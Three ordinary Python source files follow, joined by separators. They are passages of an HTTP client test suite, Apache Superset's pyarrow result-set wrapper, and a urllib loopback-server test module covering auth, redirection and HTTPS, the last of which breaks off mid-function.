# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFStringIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_send_file(self):
expected = (bytes(b'GET /foo HTTP/1.1\r\nHost: example.com\r\n') +
bytes(b'Accept-Encoding: identity\r\nContent-Length:'))
# __file__ will usually be the .pyc, i.e. binary data
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = bytes(b'this is a test this is only a test')
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = bytes(b'')
if utils.PY3:
mydata = array.array('b', expected)
else:
mydata = array.array(b'b', expected)
conn.send(mydata)
self.assertEqual(expected, sock.data)
sock.data = bytes(b'')
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_chunked(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + '0\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'hello world')
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'hello world')
self.assertEqual(repr(i),'IncompleteRead(11 bytes read)')
self.assertEqual(str(i),'IncompleteRead(11 bytes read)')
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + '0\r\n')
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
def test_negative_content_length(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\n'
'Content-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(socket.error,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
def test_filenoattr(self):
# Just test the fileno attribute in the HTTPResponse Object.
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertTrue(hasattr(resp,'fileno'),
'HTTPResponse should expose a fileno attribute')
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
self.skipTest("disabled for HTTP 0.9 support")
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
class OfflineTest(TestCase):
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen(5)
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen(5)
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
'''This will prove that the timeout gets through
HTTPConnection and into the socket.
'''
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class HTTPSTest(TestCase):
def test_attributes(self):
# simple test to check it's storing it
if hasattr(client, 'HTTPSConnection'):
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'), 'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
# Note that httplib does not accept user:password@ in the host-port.
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
8000),
("pypi.python.org:443", "pypi.python.org", 443),
("pypi.python.org", "pypi.python.org", 443),
("pypi.python.org:", "pypi.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_main(verbose=None):
support.run_unittest(HeaderTests, OfflineTest, BasicTest, TimeoutTest,
HTTPSTest, SourceAddressTest)
if __name__ == '__main__':
test_main()
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Superset wrapper around pyarrow.Table.
"""
import datetime
import json
import logging
from typing import Any, Dict, List, Optional, Tuple, Type
import numpy as np
import pandas as pd
import pyarrow as pa
from superset import db_engine_specs
from superset.typing import DbapiDescription, DbapiResult
from superset.utils import core as utils
logger = logging.getLogger(__name__)
def dedup(l: List[str], suffix: str = "__", case_sensitive: bool = True) -> List[str]:
"""De-duplicates a list of string by suffixing a counter
Always returns the same number of entries as provided, and always returns
unique values. Case sensitive comparison by default.
>>> print(','.join(dedup(['foo', 'bar', 'bar', 'bar', 'Bar'])))
foo,bar,bar__1,bar__2,Bar
>>> print(
','.join(dedup(['foo', 'bar', 'bar', 'bar', 'Bar'], case_sensitive=False))
)
foo,bar,bar__1,bar__2,Bar__3
"""
new_l: List[str] = []
seen: Dict[str, int] = {}
for item in l:
s_fixed_case = item if case_sensitive else item.lower()
if s_fixed_case in seen:
seen[s_fixed_case] += 1
item += suffix + str(seen[s_fixed_case])
else:
seen[s_fixed_case] = 0
new_l.append(item)
return new_l
def stringify(obj: Any) -> str:
return json.dumps(obj, default=utils.json_iso_dttm_ser)
def stringify_values(array: np.ndarray) -> np.ndarray:
vstringify = np.vectorize(stringify)
return vstringify(array)
def destringify(obj: str) -> Any:
return json.loads(obj)
class SupersetResultSet:
def __init__( # pylint: disable=too-many-locals,too-many-branches
self,
data: DbapiResult,
cursor_description: DbapiDescription,
db_engine_spec: Type[db_engine_specs.BaseEngineSpec],
):
self.db_engine_spec = db_engine_spec
data = data or []
column_names: List[str] = []
pa_data: List[pa.Array] = []
deduped_cursor_desc: List[Tuple[Any, ...]] = []
numpy_dtype: List[Tuple[str, ...]] = []
stringified_arr: np.ndarray
if cursor_description:
# get deduped list of column names
column_names = dedup([col[0] for col in cursor_description])
# fix cursor descriptor with the deduped names
deduped_cursor_desc = [
tuple([column_name, *list(description)[1:]])
for column_name, description in zip(column_names, cursor_description)
]
# generate numpy structured array dtype
numpy_dtype = [(column_name, "object") for column_name in column_names]
# only do expensive recasting if datatype is not standard list of tuples
if data and (not isinstance(data, list) or not isinstance(data[0], tuple)):
data = [tuple(row) for row in data]
array = np.array(data, dtype=numpy_dtype)
if array.size > 0:
for column in column_names:
try:
pa_data.append(pa.array(array[column].tolist()))
except (
pa.lib.ArrowInvalid,
pa.lib.ArrowTypeError,
pa.lib.ArrowNotImplementedError,
TypeError, # this is super hackey,
# https://issues.apache.org/jira/browse/ARROW-7855
):
# attempt serialization of values as strings
stringified_arr = stringify_values(array[column])
pa_data.append(pa.array(stringified_arr.tolist()))
if pa_data: # pylint: disable=too-many-nested-blocks
for i, column in enumerate(column_names):
if pa.types.is_nested(pa_data[i].type):
# TODO: revisit nested column serialization once nested types
# are added as a natively supported column type in Superset
# (superset.utils.core.GenericDataType).
stringified_arr = stringify_values(array[column])
pa_data[i] = pa.array(stringified_arr.tolist())
elif pa.types.is_temporal(pa_data[i].type):
# workaround for bug converting
# `psycopg2.tz.FixedOffsetTimezone` tzinfo values.
# related: https://issues.apache.org/jira/browse/ARROW-5248
sample = self.first_nonempty(array[column])
if sample and isinstance(sample, datetime.datetime):
try:
if sample.tzinfo:
tz = sample.tzinfo
series = pd.Series(
array[column], dtype="datetime64[ns]"
)
series = pd.to_datetime(series).dt.tz_localize(tz)
pa_data[i] = pa.Array.from_pandas(
series, type=pa.timestamp("ns", tz=tz)
)
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
self.table = pa.Table.from_arrays(pa_data, names=column_names)
self._type_dict: Dict[str, Any] = {}
try:
# The driver may not be passing a cursor.description
self._type_dict = {
col: db_engine_spec.get_datatype(deduped_cursor_desc[i][1])
for i, col in enumerate(column_names)
if deduped_cursor_desc
}
except Exception as ex: # pylint: disable=broad-except
logger.exception(ex)
@staticmethod
def convert_pa_dtype(pa_dtype: pa.DataType) -> Optional[str]:
if pa.types.is_boolean(pa_dtype):
return "BOOL"
if pa.types.is_integer(pa_dtype):
return "INT"
if pa.types.is_floating(pa_dtype):
return "FLOAT"
if pa.types.is_string(pa_dtype):
return "STRING"
if pa.types.is_temporal(pa_dtype):
return "DATETIME"
return None
@staticmethod
def convert_table_to_df(table: pa.Table) -> pd.DataFrame:
return table.to_pandas(integer_object_nulls=True)
@staticmethod
def first_nonempty(items: List[Any]) -> Any:
return next((i for i in items if i), None)
def is_temporal(self, db_type_str: Optional[str]) -> bool:
column_spec = self.db_engine_spec.get_column_spec(db_type_str)
if column_spec is None:
return False
return column_spec.is_dttm
def data_type(self, col_name: str, pa_dtype: pa.DataType) -> Optional[str]:
"""Given a pyarrow data type, Returns a generic database type"""
set_type = self._type_dict.get(col_name)
if set_type:
return set_type
mapped_type = self.convert_pa_dtype(pa_dtype)
if mapped_type:
return mapped_type
return None
def to_pandas_df(self) -> pd.DataFrame:
return self.convert_table_to_df(self.table)
@property
def pa_table(self) -> pa.Table:
return self.table
@property
def size(self) -> int:
return self.table.num_rows
@property
def columns(self) -> List[Dict[str, Any]]:
if not self.table.column_names:
return []
columns = []
for col in self.table.schema:
db_type_str = self.data_type(col.name, col.type)
column = {
"name": col.name,
"type": db_type_str,
"is_date": self.is_temporal(db_type_str),
}
columns.append(column)
return columns
| |
import base64
import os
import email
import urllib.parse
import urllib.request
import http.server
import threading
import unittest
import hashlib
from test import support
try:
import ssl
except ImportError:
ssl = None
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Loopback http server infrastructure
class LoopbackHttpServer(http.server.HTTPServer):
"""HTTP server w/ a few modifications that make it useful for
loopback testing purposes.
"""
def __init__(self, server_address, RequestHandlerClass):
http.server.HTTPServer.__init__(self,
server_address,
RequestHandlerClass)
# Set the timeout of our listening socket really low so
# that we can stop the server easily.
self.socket.settimeout(0.1)
def get_request(self):
"""HTTPServer method, overridden."""
request, client_address = self.socket.accept()
# It's a loopback connection, so setting the timeout
# really low shouldn't affect anything, but should make
# deadlocks less likely to occur.
request.settimeout(10.0)
return (request, client_address)
class LoopbackHttpServerThread(threading.Thread):
"""Stoppable thread that runs a loopback http server."""
def __init__(self, request_handler):
threading.Thread.__init__(self)
self._stop_server = False
self.ready = threading.Event()
request_handler.protocol_version = "HTTP/1.0"
self.httpd = LoopbackHttpServer(("127.0.0.1", 0),
request_handler)
self.port = self.httpd.server_port
def stop(self):
"""Stops the webserver if it's currently running."""
self._stop_server = True
self.join()
self.httpd.server_close()
def run(self):
self.ready.set()
while not self._stop_server:
self.httpd.handle_request()
# Authentication infrastructure
class DigestAuthHandler:
"""Handler for performing digest authentication."""
def __init__(self):
self._request_num = 0
self._nonces = []
self._users = {}
self._realm_name = "Test Realm"
self._qop = "auth"
def set_qop(self, qop):
self._qop = qop
def set_users(self, users):
assert isinstance(users, dict)
self._users = users
def set_realm(self, realm):
self._realm_name = realm
def _generate_nonce(self):
self._request_num += 1
nonce = hashlib.md5(str(self._request_num).encode("ascii")).hexdigest()
self._nonces.append(nonce)
return nonce
def _create_auth_dict(self, auth_str):
first_space_index = auth_str.find(" ")
auth_str = auth_str[first_space_index+1:]
parts = auth_str.split(",")
auth_dict = {}
for part in parts:
name, value = part.split("=")
name = name.strip()
if value[0] == '"' and value[-1] == '"':
value = value[1:-1]
else:
value = value.strip()
auth_dict[name] = value
return auth_dict
def _validate_auth(self, auth_dict, password, method, uri):
final_dict = {}
final_dict.update(auth_dict)
final_dict["password"] = password
final_dict["method"] = method
final_dict["uri"] = uri
HA1_str = "%(username)s:%(realm)s:%(password)s" % final_dict
HA1 = hashlib.md5(HA1_str.encode("ascii")).hexdigest()
HA2_str = "%(method)s:%(uri)s" % final_dict
HA2 = hashlib.md5(HA2_str.encode("ascii")).hexdigest()
final_dict["HA1"] = HA1
final_dict["HA2"] = HA2
response_str = "%(HA1)s:%(nonce)s:%(nc)s:" \
"%(cnonce)s:%(qop)s:%(HA2)s" % final_dict
response = hashlib.md5(response_str.encode("ascii")).hexdigest()
return response == auth_dict["response"]
def _return_auth_challenge(self, request_handler):
request_handler.send_response(407, "Proxy Authentication Required")
request_handler.send_header("Content-Type", "text/html")
request_handler.send_header(
'Proxy-Authenticate', 'Digest realm="%s", '
'qop="%s",'
'nonce="%s", ' % \
(self._realm_name, self._qop, self._generate_nonce()))
# XXX: Not sure if we're supposed to add this next header or
# not.
#request_handler.send_header('Connection', 'close')
request_handler.end_headers()
request_handler.wfile.write(b"Proxy Authentication Required.")
return False
def handle_request(self, request_handler):
"""Performs digest authentication on the given HTTP request
handler. Returns True if authentication was successful, False
otherwise.
If no users have been set, then digest auth is effectively
disabled and this method will always return True.
"""
if len(self._users) == 0:
return True
if "Proxy-Authorization" not in request_handler.headers:
return self._return_auth_challenge(request_handler)
else:
auth_dict = self._create_auth_dict(
request_handler.headers["Proxy-Authorization"]
)
if auth_dict["username"] in self._users:
password = self._users[ auth_dict["username"] ]
else:
return self._return_auth_challenge(request_handler)
if not auth_dict.get("nonce") in self._nonces:
return self._return_auth_challenge(request_handler)
else:
self._nonces.remove(auth_dict["nonce"])
auth_validated = False
# MSIE uses short_path in its validation, but Python's
# urllib.request uses the full path, so we're going to see if
# either of them works here.
for path in [request_handler.path, request_handler.short_path]:
if self._validate_auth(auth_dict,
password,
request_handler.command,
path):
auth_validated = True
if not auth_validated:
return self._return_auth_challenge(request_handler)
return True
class BasicAuthHandler(http.server.BaseHTTPRequestHandler):
"""Handler for performing basic authentication."""
# Server side values
USER = 'testUser'
PASSWD = 'testPass'
REALM = 'Test'
USER_PASSWD = "%s:%s" % (USER, PASSWD)
ENCODED_AUTH = base64.b64encode(USER_PASSWD.encode('ascii')).decode('ascii')
def __init__(self, *args, **kwargs):
http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def log_message(self, format, *args):
# Suppress console log message
pass
def do_HEAD(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_AUTHHEAD(self):
self.send_response(401)
self.send_header("WWW-Authenticate", "Basic realm=\"%s\"" % self.REALM)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
if not self.headers.get("Authorization", ""):
self.do_AUTHHEAD()
self.wfile.write(b"No Auth header received")
elif self.headers.get(
"Authorization", "") == "Basic " + self.ENCODED_AUTH:
self.send_response(200)
self.end_headers()
self.wfile.write(b"It works")
else:
# Request Unauthorized
self.do_AUTHHEAD()
# Proxy test infrastructure
class FakeProxyHandler(http.server.BaseHTTPRequestHandler):
"""This is a 'fake proxy' that makes it look like the entire
internet has gone down due to a sudden zombie invasion. It main
utility is in providing us with authentication support for
testing.
"""
def __init__(self, digest_auth_handler, *args, **kwargs):
# This has to be set before calling our parent's __init__(), which will
# try to call do_GET().
self.digest_auth_handler = digest_auth_handler
http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def log_message(self, format, *args):
# Uncomment the next line for debugging.
# sys.stderr.write(format % args)
pass
def do_GET(self):
(scm, netloc, path, params, query, fragment) = urllib.parse.urlparse(
self.path, "http")
self.short_path = path
if self.digest_auth_handler.handle_request(self):
self.send_response(200, "OK")
self.send_header("Content-Type", "text/html")
self.end_headers()
self.wfile.write(bytes("You've reached %s!<BR>" % self.path,
"ascii"))
self.wfile.write(b"Our apologies, but our server is down due to "
b"a sudden zombie invasion.")
# Test cases
class BasicAuthTests(unittest.TestCase):
USER = "testUser"
PASSWD = "testPass"
INCORRECT_PASSWD = "Incorrect"
REALM = "Test"
def setUp(self):
super(BasicAuthTests, self).setUp()
# With Basic Authentication
def http_server_with_basic_auth_handler(*args, **kwargs):
return BasicAuthHandler(*args, **kwargs)
self.server = LoopbackHttpServerThread(http_server_with_basic_auth_handler)
self.addCleanup(self.stop_server)
self.server_url = 'http://127.0.0.1:%s' % self.server.port
self.server.start()
self.server.ready.wait()
def stop_server(self):
self.server.stop()
self.server = None
def tearDown(self):
super(BasicAuthTests, self).tearDown()
def test_basic_auth_success(self):
ah = urllib.request.HTTPBasicAuthHandler()
ah.add_password(self.REALM, self.server_url, self.USER, self.PASSWD)
urllib.request.install_opener(urllib.request.build_opener(ah))
try:
self.assertTrue(urllib.request.urlopen(self.server_url))
except urllib.error.HTTPError:
self.fail("Basic auth failed for the url: %s" % self.server_url)
def test_basic_auth_httperror(self):
ah = urllib.request.HTTPBasicAuthHandler()
ah.add_password(self.REALM, self.server_url, self.USER, self.INCORRECT_PASSWD)
urllib.request.install_opener(urllib.request.build_opener(ah))
self.assertRaises(urllib.error.HTTPError, urllib.request.urlopen, self.server_url)
class ProxyAuthTests(unittest.TestCase):
URL = "http://localhost"
USER = "tester"
PASSWD = "test123"
REALM = "TestRealm"
@support.requires_hashdigest("md5")
def setUp(self):
super(ProxyAuthTests, self).setUp()
# Ignore proxy bypass settings in the environment.
def restore_environ(old_environ):
os.environ.clear()
os.environ.update(old_environ)
self.addCleanup(restore_environ, os.environ.copy())
os.environ['NO_PROXY'] = ''
os.environ['no_proxy'] = ''
self.digest_auth_handler = DigestAuthHandler()
self.digest_auth_handler.set_users({self.USER: self.PASSWD})
self.digest_auth_handler.set_realm(self.REALM)
# With Digest Authentication.
def create_fake_proxy_handler(*args, **kwargs):
return FakeProxyHandler(self.digest_auth_handler, *args, **kwargs)
self.server = LoopbackHttpServerThread(create_fake_proxy_handler)
self.addCleanup(self.stop_server)
self.server.start()
self.server.ready.wait()
proxy_url = "http://127.0.0.1:%d" % self.server.port
handler = urllib.request.ProxyHandler({"http" : proxy_url})
self.proxy_digest_handler = urllib.request.ProxyDigestAuthHandler()
self.opener = urllib.request.build_opener(
handler, self.proxy_digest_handler)
def stop_server(self):
self.server.stop()
self.server = None
def test_proxy_with_bad_password_raises_httperror(self):
self.proxy_digest_handler.add_password(self.REALM, self.URL,
self.USER, self.PASSWD+"bad")
self.digest_auth_handler.set_qop("auth")
self.assertRaises(urllib.error.HTTPError,
self.opener.open,
self.URL)
def test_proxy_with_no_password_raises_httperror(self):
self.digest_auth_handler.set_qop("auth")
self.assertRaises(urllib.error.HTTPError,
self.opener.open,
self.URL)
def test_proxy_qop_auth_works(self):
self.proxy_digest_handler.add_password(self.REALM, self.URL,
self.USER, self.PASSWD)
self.digest_auth_handler.set_qop("auth")
with self.opener.open(self.URL) as result:
while result.read():
pass
def test_proxy_qop_auth_int_works_or_throws_urlerror(self):
self.proxy_digest_handler.add_password(self.REALM, self.URL,
self.USER, self.PASSWD)
self.digest_auth_handler.set_qop("auth-int")
try:
result = self.opener.open(self.URL)
except urllib.error.URLError:
# It's okay if we don't support auth-int, but we certainly
# shouldn't receive any kind of exception here other than
# a URLError.
pass
else:
with result:
while result.read():
pass
def GetRequestHandler(responses):
class FakeHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
server_version = "TestHTTP/"
requests = []
headers_received = []
port = 80
def do_GET(self):
body = self.send_head()
while body:
done = self.wfile.write(body)
body = body[done:]
def do_POST(self):
content_length = self.headers["Content-Length"]
post_data = self.rfile.read(int(content_length))
self.do_GET()
self.requests.append(post_data)
def send_head(self):
FakeHTTPRequestHandler.headers_received = self.headers
self.requests.append(self.path)
response_code, headers, body = responses.pop(0)
self.send_response(response_code)
for (header, value) in headers:
self.send_header(header, value % {'port':self.port})
if body:
self.send_header("Content-type", "text/plain")
self.end_headers()
return body
self.end_headers()
def log_message(self, *args):
pass
return FakeHTTPRequestHandler
class TestUrlopen(unittest.TestCase):
"""Tests urllib.request.urlopen using the network.
These tests are not exhaustive. Assuming that testing using files does a
good job overall of some of the basic interface features. There are no
tests exercising the optional 'data' and 'proxies' arguments. No tests
for transparent redirection have been written.
"""
def setUp(self):
super(TestUrlopen, self).setUp()
# Ignore proxies for localhost tests.
def restore_environ(old_environ):
os.environ.clear()
os.environ.update(old_environ)
self.addCleanup(restore_environ, os.environ.copy())
os.environ['NO_PROXY'] = '*'
os.environ['no_proxy'] = '*'
def urlopen(self, url, data=None, **kwargs):
l = []
f = urllib.request.urlopen(url, data, **kwargs)
try:
# Exercise various methods
l.extend(f.readlines(200))
l.append(f.readline())
l.append(f.read(1024))
l.append(f.read())
finally:
f.close()
return b"".join(l)
def stop_server(self):
self.server.stop()
self.server = None
def start_server(self, responses=None):
if responses is None:
responses = [(200, [], b"we don't care")]
handler = GetRequestHandler(responses)
self.server = LoopbackHttpServerThread(handler)
self.addCleanup(self.stop_server)
self.server.start()
self.server.ready.wait()
port = self.server.port
handler.port = port
return handler
def start_https_server(self, responses=None, **kwargs):
if not hasattr(urllib.request, 'HTTPSHandler'):
self.skipTest('ssl support required')
from test.ssl_servers import make_https_server
if responses is None:
responses = [(200, [], b"we care a bit")]
handler = GetRequestHandler(responses)
server = make_https_server(self, handler_class=handler, **kwargs)
handler.port = server.port
return handler
def test_redirection(self):
expected_response = b"We got here..."
responses = [
(302, [("Location", "http://localhost:%(port)s/somewhere_else")],
""),
(200, [], expected_response)
]
handler = self.start_server(responses)
data = self.urlopen("http://localhost:%s/" % handler.port)
self.assertEqual(data, expected_response)
self.assertEqual(handler.requests, ["/", "/somewhere_else"])
def test_chunked(self):
expected_response = b"hello world"
chunked_start = (
b'a\r\n'
b'hello worl\r\n'
b'1\r\n'
b'd\r\n'
b'0\r\n'
)
response = [(200, [("Transfer-Encoding", "chunked")], chunked_start)]
handler = self.start_server(response)
data = self.urlopen("http://localhost:%s/" % handler.port)
self.assertEqual(data, expected_response)
def test_404(self):
expected_response = b"Bad bad bad..."
handler = self.start_server([(404, [], expected_response)])
try:
self.urlopen("http://localhost:%s/weeble" % handler.port)
except urllib.error.URLError as f:
data = f.read()
f.close()
else:
self.fail("404 should raise URLError")
self.assertEqual(data, expected_response)
self.assertEqual(handler.requests, ["/weeble"])
def test_200(self):
expected_response = b"pycon 2008..."
handler = self.start_server([(200, [], expected_response)])
data = self.urlopen("http://localhost:%s/bizarre" % handler.port)
self.assertEqual(data, expected_response)
self.assertEqual(handler.requests, ["/bizarre"])
def test_200_with_parameters(self):
expected_response = b"pycon 2008..."
handler = self.start_server([(200, [], expected_response)])
data = self.urlopen("http://localhost:%s/bizarre" % handler.port,
b"get=with_feeling")
self.assertEqual(data, expected_response)
self.assertEqual(handler.requests, ["/bizarre", b"get=with_feeling"])
def test_https(self):
handler = self.start_https_server()
context = ssl.create_default_context(cafile=CERT_localhost)
data = self.urlopen("https://localhost:%s/bizarre" % handler.port, context=context)
self.assertEqual(data, b"we care a bit")
def test_https_with_cafile(self):
handler = self.start_https_server(certfile=CERT_localhost)
with support.check_warnings(('', DeprecationWarning)):
# Good cert
data = self.urlopen("https://localhost:%s/bizarre" % handler.port,
cafile=CERT_localhost)
self.assertEqual(data, b"we care a bit")
# Bad cert
with self.assertRaises(urllib.error.URLError) as cm:
self.urlopen("https://localhost:%s/bizarre" % handler.port,
cafile=CERT_fakehostname)
# Good cert, but mismatching hostname
handler = self.start_https_server(certfile=CERT_fakehostname)
with self.assertRaises(urllib.error.URLError) as cm:
self.urlopen("https://localhost:%s/bizarre" % handler.port,
cafile=CERT_fakehostname)
def test_https_with_cadefault(self):
handler = self.start_https_server(certfile=CERT_localhost)
# Self-signed cert should fail verification with system certificate store
with support.check_warnings(('', DeprecationWarning)):
with self.assertRaises(urllib.error.URLError) as cm:
self.urlopen("https://localhost:%s/bizarre" % handler.port,
cadefault=True)
def test_https_sni(self):
if ssl is None:
self.skipTest("ssl module required")
if not ssl.HAS_SNI:
self.skipTest("SNI support required in OpenSSL")
sni_name = None
def cb_sni(ssl_sock, server_name, initial_context):
nonlocal sni_name
sni_name = server_name
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.set_servername_callback(cb_sni)
handler = self.start_https_server(context=context, certfile=CERT_localhost)
context = ssl.create_default_context(cafile=CERT_localhost)
self.urlopen("https://localhost:%s" % handler.port, context=context)
self.assertEqual(sni_name, "localhost")
def test_sending_headers(self):
handler = self.start_server()
req = urllib.request.Request("http://localhost:%s/" % handler.port,
headers={"Range": "bytes=20-39"})
with urllib.request.urlopen(req):
pass
self.assertEqual(handler.headers_received["Range"], "bytes=20-39")
def test_basic(self):
handler = self.start_server()
with urllib.request.urlopen("http://localhost:%s" % handler.port) as open_url:
for attr in ("read", "close", "info", "geturl"):
self.assertTrue(hasattr(open_url, attr), "object returned from "
"urlopen lacks the %s attribute" % attr)
self.assertTrue(open_url.read(), "calling 'read' failed")
def test_info(self):
handler = self.start_server()
open_url = urllib.request.urlopen(
"http://localhost:%s" % handler.port)
with open_url:
info_obj = open_url.info()
self.assertIsInstance(info_obj, email.message.Message,
"object returned by 'info' is not an "
"instance of email.message.Message")
self.assertEqual(info_obj.get_content_subtype(), "plain")
def test_geturl(self):
# Make sure same URL as opened is returned by geturl.
handler = self.start_server()
open_url = urllib.request.urlopen("http://localhost:%s" % handler.port)
with open_url:
url = open_url.geturl()
self.assertEqual(url, "http://localhost:%s" % handler.port)
def test_iteration(self):
expected_response = b"pycon 2008..."
handler = self.start_server([(200, [], expected_response)])
